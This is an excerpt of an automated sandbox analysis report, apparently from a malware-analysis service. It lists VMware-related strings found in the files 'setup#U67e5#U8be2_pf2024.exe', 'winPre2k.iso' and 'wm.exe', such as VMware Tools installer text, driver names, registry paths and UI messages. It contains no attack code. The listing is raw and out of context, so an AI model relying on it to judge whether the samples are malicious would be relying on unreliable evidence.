                    Source: winPre2k.iso.0.drBinary or memory string: <description>"VMware installation launcher"</description>
                    Source: wm.exe.0.drBinary or memory string: vmw_unity_windowvmware-vmx:host:PowerOnNoneSuspendPowerOffGuestShutdown@&!*@*@(button.wui.pageframe.ok)OK@&!*@*@(button.wui.pageframe.cancel)Cancel@&!*@*@(button.wui.pageframe.help)Help@&!*@*@(button.wui.pageframe.close)Close@&!*@*@(button.wui.pageframe.apply)&Apply@&!*@*@(button.wui.pageframe.back)< &Back@&!*@*@(button.wui.pageframe.next)&Next >@&!*@*@(button.wui.pageframe.finish)Finish@&!*@*@(button.wui.pageframe.authorize)&Unlock All Settings...RN!*
                    Source: winPre2k.iso.0.drBinary or memory string: 7) [VMware SVGA II]
                    Source: winPre2k.iso.0.drBinary or memory string: VMware-Produktinstallation
                    Source: wm.exe.0.drBinary or memory string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdb
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: GA"HgfsServerGetAccess: error: prefix too long
                    Source: winPre2k.iso.0.drBinary or memory string: Pinstmsia.exePA1031 1033 1036 10412002001{B53D42E8-872B-430E-82D4-80065A31FCE1};{3B410500-1802-488E-9EF1-4B11992E0440}INSTALLUPDPA{FE2F6A2C-196E-4210-9C04-2B1BC21F07EF}PAVMware ToolsPA0PAVmware Tools.msiPAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPA
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.menu.file.connectVCA)Connect to &VMware vCloud Air...
                    Source: wm.exe.0.drBinary or memory string: vmware.ThumbnailWindow
                    Source: wm.exe.0.drBinary or memory string: ?Initialize@vmnetcfg@util@wui@@YAXXZ"
                    Source: winPre2k.iso.0.drBinary or memory string: Couldn't find tray app windowPosted WM_QUIT to tray applicationVMwareTrayIconStopping the tray apptoolsERROR: 'toolinstall.end %i' command failedtoolinstall.end %cERROR: 'tools.set.version 0' command failedtools.set.version 0Sending the 'tools.set.version 0' RPC to the VMXSet %s feature state to %dERROR: Failed to set %s feature status: %dPerfSettingSYSTEM\CurrentControlSet\Services\Tcpip\ParametersTcpWindowSizeSetting performance settingsSYSTEM\CurrentControlSet\Services\DiskTimeOutValueSetting disk time-outSuccessfully installed graphics driverFailed to install graphics driverFailed to get address for InstallGraphicsDriverInstallGraphicsDriverFailed to load desk.cpl: %ddesk.cplFailed to delete inf filesFailed to find DrvrInstDeleteInfFiles: %dDrvrInstDeleteInfFilesDrvrInstRemoveDriverForClass returned: 0x%08xFailed to find DrvrInstRemoveDriverForClass: %dDrvrInstRemoveDriverForClassFailed to load %s: %dVMReportExpectedTicksHgfsVMXNetMemCtlMouseSVGADriversToolboxSetting feature statesUnmounting Tools image after successful installUnmounting Tools image after cancelled installUnmounting Tools image after failed installFailed to find DrvrInstInstallDriverForClass: %dDrvrInstInstallDriverForClassFailed to delete some per-user installer keys
                    Source: winPre2k.iso.0.drBinary or memory string: r Speichersteuerung wird installiertVM_InstallMouseDriver9xNTMaustreiber wird installiertVM_InstallVideoDriver9xSVGA-Treiber wird installiertVM_InstallVideoDriver9x_SetDataVM_InstallVideoDriverNTVM_InstallVMXNetDriverVMXNet-Treiber wird installiertVM_Launch9xServiceVMware-Dienst wird gestartetVM_Launch9xService_SetDataVM_LaunchTrayTaskleistenanwendung wird installiertVM_LaunchTray_SetDataVM_LaunchUserProcessVMware-Benutzeranwendung wird gestartetVM_LaunchUserProcess_SetDataVM_PatchBatchFilesBatchdateien werden gepatchtVM_Stop9xServiceVMware-Dienst wird angehaltenVM_Stop9xService_SetDataVM_StopTrayTaskleistenanwendung wird angehaltenVM_StopUserProcessVMware-Benutzeranwendung wird angehaltenVM_UninstallMemctlDriverNTSpeichersteuerungstreiber wird deinstalliertVM_UninstallMouseDriverMaustreiber wird deinstalliertVM_UninstallVideoDriverSVGA-Treiber wird deinstalliertVM_UninstallVMXNetDriverVMXNet-Treiber wird deinstalliertWriteEnvironmentStringsWriteIniValuesINI-Dateiwerte werden geschriebenWriteRegistryValuesSystemregistrierungswerte werden geschriebenSchl
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: tat et aux performances d'une machine virtuelle.HgfsDossiers partag
                    Source: wm.exe.0.drBinary or memory string: Pvmware.LibraryWindow
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLibJava.lib_win32-?,
                    Source: winPre2k.iso.0.drBinary or memory string: s vmmemctl.sysNTE*$
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machines cannot be run in the background. You can power them off now.Failed to close VMs: %s
                    Source: winPre2k.iso.0.drBinary or memory string: Installation de VMware Tools
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: tres ToolsVM_MigrateLegacySettings_SetDataVM_WriteHgfsRegistry
                    Source: winPre2k.iso.0.drBinary or memory string: s!vmmouse.inf9X%
                    Source: winPre2k.iso.0.drBinary or memory string: blicherweise "D:\VMware Tools.msi".
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.drBinary or memory string: APW@canAuthorRestrictedVMscanBrowseFilesOnVIMcanCacheEncryptionKeyscanChangeNetworkPromptForPromisccanCollectDatacanConnectToHorizonFlexcanConnectToVCloudcanConnectToVIMcanRunLocalVMscanPinUnityWindowscanShowUnityWindowDecorationscanSupportAeroPeekInUnitycanSupportAdvancedSettingscanSupportDeviceSettingscanSupportLocalUSBcanSupportVirtualSmartCardscanSupportVirtualUSBCameracanSupportPerVMHotKeyscanSupportPolicyEnforcementcanSupportRecordReplaycanSupportUnitycanSupportShowTaskbarInUnitycanDoMoveDrivenOptimizedUnityWindowMovescanDoTitlebarDrivenOptimizedUnityWindowMovescanShowOptimizedUnityWindowMoveOverlayscanDoOptimizedUnityWindowResizesshouldShowFloatingLanguageBarInUnitycanSupportShowNotificationAreaInUnitycanSupportIMEPassthroughInUnityshouldRedactUnityWindowTitleLogStringcanSupportVMEncryptioncanSupportVNCcanSupportShrinkDiskTreecanShowNetworkEditorcanSupportCloningcanSupportOVFExportcanSupportVMDBHGFSMgmtcanLogVigorInfocanShowGuestInfocanSupportUEFISecureBootcanSupportVBScanSupportKeyboardFiltercanSupportUIDrawnMKScanSupportUIDrawnMKSNonInteractivecanSupportAppendingVCenterNodeTitlecanSupportDarkModecanSupportDarkModeSyncshouldRespectTopmostStylecanSupportVigorCnxFScanSupportVigorHostInfocanSupportMetalcanSupportJumboFramecanSupportHW17canSupportHW18canSupportPrivilegeHelpercanSupportHWFuturecanSupportRemoteDeviceVMotionshouldRefreshDesktopIconscanSupportSpecifyDisplayscanConvertNormalWindowToMenu
                    Source: winPre2k.iso.0.drBinary or memory string: CompanyNameVMware, Inc.b
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: ZB1 argument requiredtools.capability.hgfs_server %s %s01f0AA
                    Source: winPre2k.iso.0.drBinary or memory string: "D:\VMware Tools.msi".
                    Source: winPre2k.iso.0.drBinary or memory string: rique VMwarePilotes utilis
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareHgfsClient.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: r erneute Installation werden gesuchtVM_MigrateLegacySettingsTooleinstellungen werden migriertVM_MigrateLegacySettings_SetDataVM_WriteHgfsRegistryRegistrierungseintr
                    Source: winPre2k.iso.0.drBinary or memory string: Hostinfo_HostNameSHGetFolderPathAshfolder.dll\VMwaredbghelp.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=VMware%s GetAdaptersInfo failure %d: %d.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: ERROR: Failed to copy the hgfs driver file!
                    Source: winPre2k.iso.0.drBinary or memory string: 2VMwareToolsUpgrader9x.exeT
                    Source: winPre2k.iso.0.drBinary or memory string: hlen Sie diese Option aus, wenn Sie diese virtuelle Maschine mit mehreren VMware-Produkten ausf
                    Source: winPre2k.iso.0.drBinary or memory string: 0n0VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: REG_SHARED_FOLDER_NAMEVMware
                    Source: winPre2k.iso.0.drBinary or memory string: SetupDiEnumDriverInfoW: Found VMware driver
                    Source: winPre2k.iso.0.drBinary or memory string: vmmemctl.sysNT
                    Source: wm.exe.0.drBinary or memory string: vmware.DWMThumbProxyWndCDWMProxyWndMgr::Enable%s: ITaskbarList::HrInit failed, error: 0x%08X
                    Source: winPre2k.iso.0.drBinary or memory string: gD:\VMware Tools.msi
                    Source: wm.exe.0.drBinary or memory string: vmware.exe??4CInitGdiplus@wui@@QAEAAV01@ABV01@@Z??_FCInitGdiplus@wui@@QAEXXZ
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s!vmGuestLibTest.c
                    Source: winPre2k.iso.0.drBinary or memory string: HW version is %i: Installing VMware NIC driver
                    Source: winPre2k.iso.0.drBinary or memory string: 4) Select VMware, Inc. froInstalling the SVGA Drivers
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Uninstalling the WinNT hgfs driver
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: (SERIALNUMVALRETURN<>SERIALNUMVALSUCCESSRETVAL)(Not SERIALNUMVALRETURN) OR (SERIALNUMVALRETURN=SERIALNUMVALSUCCESSRETVAL)ApplicationUsers = "AllUsers" And Privileged[ALLUSERS]ApplicationUsers = "OnlyCurrentUser" And PrivilegedCustomSetupTipsMaintenanceTypeCustom[RadioSetupType]InstallChangeFolderSelectionBrowseDiskSpaceRequirementsDatabaseFolderDATABASEDIR[_BrowseProperty]DestinationFolderFilesInUseIgnoreRetrySplashBitmap_IsMaintenance = "Change"_IsMaintenance = "Reinstall"_IsMaintenance = "Remove"ReadyToRemoveModify[ProgressType0]RepairModifying[ProgressType1]Repairingmodified[ProgressType2]repairs[ProgressType3]modifies[ModifyText][ProgressType4][RepairText][ModifyTextNoKey][ProgressType5][RepairTextNoKey][REINSTALL]Reinstall[ReinstallModeText]ReinstallModeACTION = "ADMIN"ResumeACTION <> "ADMIN"PATCH And REINSTALL=""PATCH And REINSTALLMODE=""omusNOT Installed AND RadioSetupType <> "Custom"Installed OR RadioSetupType = "Custom"Installed AND _IsMaintenance = "Reinstall"RadioSetupType = "Typical" And (Not Installed)VM_SetProductFeaturesRemoveNowUninstallinguninstalleduninstalls[REMOVE]VMCheckForHtmlHelpVMCheckRequirementsVMCleanLegacyTools[StartupFolder]VMInstallHgfsDriverNTVMInstallMemctlDriverNTVMInstallMouseDriver9xNTVMInstallVideoDriver9x[DRIVER_VIDEO];[SUPPORTDIR];[SUPPORTDIR]\NTinstutil.dll;[UILevel]VMInstallVideoDriverNTVMInstallVMXNetDriverVMLaunch9xService[INSTALLDIR]VMLaunchTrayVMLaunchUserProcessVMPatchBatchFilesVMStop9xServiceVMStopTrayVMStopUserProcessVMUninstallMemctlDriverNTVMUninstallMouseDriverJ
                    Source: winPre2k.iso.0.drBinary or memory string: SetupDiEnumDriverInfoA: Found VMware driver
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmuiWin32.VCServerInstalled)Shared VMs cannot be used on a host that has VMware vCenter Server installed. To use shared VMs, uninstall vCenter Server and reinstall %s.
                    Source: winPre2k.iso.0.drBinary or memory string: ein VMware-ProduktKEine andere Setup-Instanz wird bereits ausgef
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s vmGuestLib.dll
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: uncdrivetoolbox/windows/hgfslib/hgfsServerWin32.cHgfsServerGetOpenFlags: Invalid HgfsOpenFlags
                    Source: wm.exe.0.drBinary or memory string: FileDescriptionVMware WorkstationL
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareUser.exe
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.library.notPoweredOn)Unable to connect to this virtual machine because it is not powered on. To power on the virtual machine, login to the VMware vCloud Air at: http://www.vmware.com/go/vcloud_login
                    Source: winPre2k.iso.0.drBinary or memory string: ralement de "D:\VMware Tools.msi".
                    Source: winPre2k.iso.0.drBinary or memory string: 1) If the VMware Tools Tools installer is prompting for a
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: NO_UNINSTALL_HGFS=1
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.statusHome.connectVCAAction.title)Connect to VMware vCloud Air
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Installing 64 bit hgfs driver
                    Source: winPre2k.iso.0.drBinary or memory string: <description>"VMware Tools Upgrader"</description>
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s hgfs.dll
                    Source: winPre2k.iso.0.drBinary or memory string: msiexec -i "D:\VMware Tools.msi" TRANSFORMS="D:\1036.mst"
                    Source: winPre2k.iso.0.drBinary or memory string: (&A)VMwareToolsServiceVMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: FileDescriptionVMware cacheMod UtilityH
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s hgfs.sysNTPM
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: schtVM_CleanLegacyTools_SetDataVM_InstallHgfsDriverNTTreiber f
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.collectSupportData.title)Collect Support Data@&!*@*@(msg.vmui.collectSupportData.description)Select the virtual machines you want to collect support data for. When this process finishes (which may take several minutes), you can send the collected data to VMware for troubleshooting.@&!*@*@(msg.vmui.collectSupportData.btnCollect)&Collect...
                    Source: winPre2k.iso.0.drBinary or memory string: 0@VMware
                    Source: winPre2k.iso.0.drBinary or memory string: nnen diese Version der VMware Tools in dieser virtuellen Maschine nicht installieren.
                    Source: winPre2k.iso.0.drBinary or memory string: <description>"VMware cacheMod Utility"</description>
                    Source: winPre2k.iso.0.drBinary or memory string: msiexec -i "D:\VMware Tools.msi" TRANSFORMS="D:\1041.mst"
                    Source: wm.exe.0.drBinary or memory string: ?sCacheUpdated@vmnetcfg@util@wui@@3V?$signal@XUnil@sigc@@U12@U12@U12@U12@U12@U12@@sigc@@A
                    Source: winPre2k.iso.0.drBinary or memory string: ProductNameVMware Toolser by setupgen at make time.> L
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.dialog.loginVca.title)Connect to VMware vCloud Air
                    Source: winPre2k.iso.0.drBinary or memory string: 8) [VMware SVGA II]
                    Source: winPre2k.iso.0.drBinary or memory string: Custom look up selected driver is %s and not %sskipping driver during look upVMwarefailed to get selected driver: %d
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools Setup
                    Source: wm.exe.0.drBinary or memory string: Please instead use: vmware-vmx --query-licensePlease instead use: vmware-vmx --can-runPlease instead use: vmware-vmx --new-sn XXXXX-XXXXX-XXXXX-XXXXX-XXXXXlog.configui.log.fileNamelog.suffixuilog.keepOldPID: %u, log output: %s
                    Source: wm.exe.0.drBinary or memory string: ?IntToStr@utf@@YA?AVstring@1@_J@Z(?bytes@string@utf@@QBEIXZvmwarestring.dllA
                    Source: winPre2k.iso.0.drBinary or memory string: cuter cette machine virtuelle uniquement avec ce produit VMware.CustTextPermet de choisir les fonctionnalit
                    Source: winPre2k.iso.0.drBinary or memory string: [VMware SVGA II]
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machine cannot be run in the background. You can choose to suspend it for later use or power it off now.@&!*@*@(msg.vmuiAppVM.closeVMTab.vmPoweredOnNoSuspend)"%s" is still powered on.
                    Source: winPre2k.iso.0.drBinary or memory string: s!vmmouse.vxdX
                    Source: winPre2k.iso.0.drBinary or memory string: 2VMwareToolsUpgraderNT.exe8}}~bb~q
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools SetupSetup needs to reboot the system in order to complete the install. Do you want to reboot now? The system will be rebooted shortly unless you cancel the reboot by answering "No".Setup process returned %d
                    Source: winPre2k.iso.0.drBinary or memory string: Installation der VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: 1) If the VMware Tools installer is prompting for a
                    Source: winPre2k.iso.0.drBinary or memory string: VMware
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Toolsn0
                    Source: winPre2k.iso.0.drBinary or memory string: ndernProductLanguage1031ProgressType4&InstallierenProgressType5InstallierenREG_SHARE_NAMEKeineREG_SHARED_FOLDER_NAMEVMware-OrdnerfreigabenRepairText&ReparierenRepairTextNoKeyReparierenInstallShieldTempPropDriversVMware-Ger
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Failed to find 64 bit hgfs driver install helper.
                    Source: winPre2k.iso.0.drBinary or memory string: 7) Select "VMware SVGA II" display adapter and click OK.
                    Source: wm.exe.0.drBinary or memory string: NW@'KVMUIViewvmware.fullScreenToolbarD:\build\ob\bora-17171714\bora\apps\lib\wui/util/foregroundChanger.h
                    Source: winPre2k.iso.0.drBinary or memory string: VM_StopUserProcessVMware
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: hgfs.fdCache.maxNodes
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools\UninstallFiles
                    Source: wm.exe.0.drBinary or memory string: Usage: vmware [OPTION ...] [--] [configuration file(s)]
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools-Setup
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLib.lib_win32
                    Source: winPre2k.iso.0.drBinary or memory string: Win32 VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareHgfsClient.exe
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: hren Sie die Datei InstMsi.exe im Verzeichnis "msi" des VMware Tools-CD-Image aus. Der Pfad lautet auf einem Gastbetriebssystem
                    Source: wm.exe.0.drBinary or memory string: GKvmware.Pane4GW`
                    Source: wm.exe.0.drBinary or memory string: ?TabStripScrollButton@Palette@wui@@3VWColor@2@Avmwarewui.dll
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: hgfs.fdCache.maxNodesASSERT %s:%d bugNr=%d
                    Source: winPre2k.iso.0.drBinary or memory string: marrage du service VMwareVM_Launch9xService_SetDataVM_LaunchTrayLancement d'une application de barre d'
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: !"#$%&'(toolsInstUtil.dllVMCheckForHtmlHelpVMCheckRebootVMCheckRequirementsVMCheckShlwapiVMCleanLegacyToolsVMCleanOldPerUserMSIToolsVMDeleteFilesVMDisplayManualVideoInstallVMHackSourcePathVMInstallHgfsDriverNTVMInstallMemctlDriverNTVMInstallMouseDriver9xNTVMInstallVMXNetDriverVMInstallVideoDriver9xVMInstallVideoDriverNTVMLaunch9xServiceVMLaunchTrayVMLaunchUserProcessVMLegacyOrMinorUpgradeMigrateToolsConfVMLogEndVMLogStartVMPatchBatchFilesVMRegisterCplVMReportExpectedTicksVMSetDiskTimeOutVMSetPerfSettingsVMSetProductFeaturesVMSetToolsUninstalledVMStop9xServiceVMStopTrayVMStopUserProcessVMUninstallHgfsDriverNTVMUninstallMemctlDriverNTVMUninstallMouseDriverVMUninstallVMXNetDriverVMUninstallVideoDriverVMUnmountImageCancelVMUnmountImageFailureVMUnmountImageSuccessVMUnregisterCplVMUpdateManifestFile
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareToolsUpgrader.exe
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMUninstallVideoDriverVMUninstallVMXNetDriverVMUnmountImageCancelVMSetProductFeaturesVMLogEndVMUnmountImageFailureVMDisplayManualVideoInstallSetAllUsersSFCleanupExSFStartupEx[%SystemRoot]\Profiles\All UsersARPINSTALLLOCATION[%USERPROFILE][SUPPORTDIR]VMCheckRebootVMCheckShlwapiVMCleanOldPerUserMSITools[SUPPORTDIR]\NTinstutil.dllVMDeleteFiles[%NUMBER_OF_PROCESSORS]NUM_PROCESSORSVMHackSourcePathVMReportExpectedTicks[DRIVER_HGFS][DRIVER_MEMCTL][DRIVER_MOUSE];[SUPPORTDIR]\NTinstutil.dll;[UILevel][DRIVER_VIDEO];[
                    Source: winPre2k.iso.0.drBinary or memory string: Invalid keyName in Util_IsKeyEmptyFailed to open key %sBegin LoggingUnable to log to intended file %s, error %dvminstutil.logvminst.logEnd LoggingFailure reallocating memory.;Failure allocating memoryError reading already existing value %dComponentsSOFTWARE\VMware, Inc.\NeedRebootSOFTWARE\VMware, Inc.Empty string detectedNull parameter detected.Invalid keyName in DeleteKey
                    Source: winPre2k.iso.0.drBinary or memory string: 4) Select VMware, Inc. from the Manufacturer list.
                    Source: winPre2k.iso.0.drBinary or memory string: B-4626-89A9-D12DD83C0078}hgfs.sysNTVersionNT<500{054ADE85-55A6-4820-8FED-DAE8C6699D2D}vmmemctl.sysNT{3A081B3F-DFB3-48D6-8BF9-2303684588E3}vmmouse.vxd{2AC92336-2501-4B87-930E-CE005AE6FDAA}vmmouse.inf9X{C7599333-F2A8-4F5C-AA62-F9B7938A3A4B}vmmouse.infNTenVersionNT<500 And ProductLanguage=1033{A6EBF271-6986-4F13-A4A7-ACCA7CDFF9EC}vmmouse.infNTjaVersionNT<500 And ProductLanguage=1041{B5A90F98-BE15-4B08-9A2D-D82B5C895FBA}vmmouse.sysNTen{3672F3DF-BCF1-4041-8063-120F4AFD7533}vmmouse.sysNTja{24A434CE-C69A-4290-8968-C9FD73E42680}VMX_SVGA.vxd{74AF3262-2BA8-4B38-987D-9F61D8544020}VMX_SVGA.DRV{E0BC39AB-0A1C-4BCA-B96A-25FA31412BA8}vmx_fb.dllNT{24D496E3-26AF-4F1E-B987-5D03BCC39041}vmx_svga.inf9X{B4CE6662-C31A-4A2D-9CDB-058BDC9808A7}vmx_svga.infNT{CBCAF700-3911-49DE-9341-18B0876C9D8F}vmx_mode.dllNT{F28D5F59-246D-4E2C-B997-6E1A3D352B00}vmx_svga.sysNTVersionNT< 500{BFF40D3C-D041-4BCC-A9DC-AFD0A1290D98}oemsetup.inf{C6104CF5-F6ED-49C5-BC76-30DE4EDAD79A}vmxnet.sysNT{6BB7F685-59E9-4D21-A9FB-81A491C1D4AC}WyseMMRFilter.dll0{E77FD426-FECC-4363-93D7-A6C43A48106E}{A1812A79-4275-4F2D-9044-B9F8A66A016A}{1D6C0034-2C40-4699-A559-C08A9E9CE690}{F3F39F9F-320C-4F1F-9E60-7F049C6CE252}unicows.dll{F7B06F6C-3191-4C05-969E-63FAA8F753B9}vmGuestLib.dllNot Version9X{0C869449-6A21-4505-BE5F-A88B07D60013}vmGuestLib.h{AD8AE912-CB88-42B8-B0FB-594A892EEE77}vmGuestLib.lib_win32{B75DCF10-7186-46C0-AE36-B36E5051999C}vmGuestLibJava.dll{DA063E6C-77FD-4266-A70F-DB9DCA614538}vmGuestLibJava.jar{7823D807-F551-4BAD-A7B7-DC7828A4BE59}vmGuestLibJava.lib_win32{1E860E56-C97D-401B-9398-5807BF1C4E58}vmGuestLibTest.c{E429DBC0-6442-48BF-86F2-ABB39636BFA3}allclasses-frame.html{0D96FEBD-7614-4139-AF86-FADACA48EA68}allclasses-noframe.html{C6DEA180-B1F7-4A8A-A20A-C170155BBDE3}constant-values.html{AEDF7D6E-E40C-4DE3-901E-AA1FB7FE16F4}help-doc.html{6FFCB87C-E4B8-4AA0-A58C-52B29E2118B4}includeCheck.h{72E3EBD8-FC2E-417D-9708-1D1D02FA2BFA}index-all.html{D64AC302-4251-4E4F-8CC5-64A399F4BAF8}index.html{1FBDE9D3-ECEE-4A7D-B454-729E5012790C}inherit.gif{0CF53249-E828-44BB-92EF-D8BF08EF07EA}overview-summary.html{FD53519A-968B-479A-A3D5-B37B00FCF86A}overview-tree.html{E93654E3-91D6-4E18-9812-C24EC1A9A22E}package-frame.html{B20980A8-9C96-4CBF-8F6A-486E25D37B35}package-list{932F55EA-C60C-4B16-8B7F-82D91CD848DA}package-summary.html{5A1584E5-D55E-4E02-9092-9C74B8ADDB01}package-tree.html{6E30A720-60D9-4975-8A10-9DE99EA55261}serialized-form.html{80D2EA3C-76C1-43E8-9357-17F61E63B00F}stylesheet.css{A6F56F3B-40F9-49B6-83AA-3662346141AC}vmSessionId.h{A9F5FFED-78D2-4EB7-8684-38A9890153F8}vm_basic_types.h1
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: hgfs.sys
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: hgfs.sysNT
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.statusHome.connectVCAAction.desc)View and manage virtual machines on VMware vCloud Air.
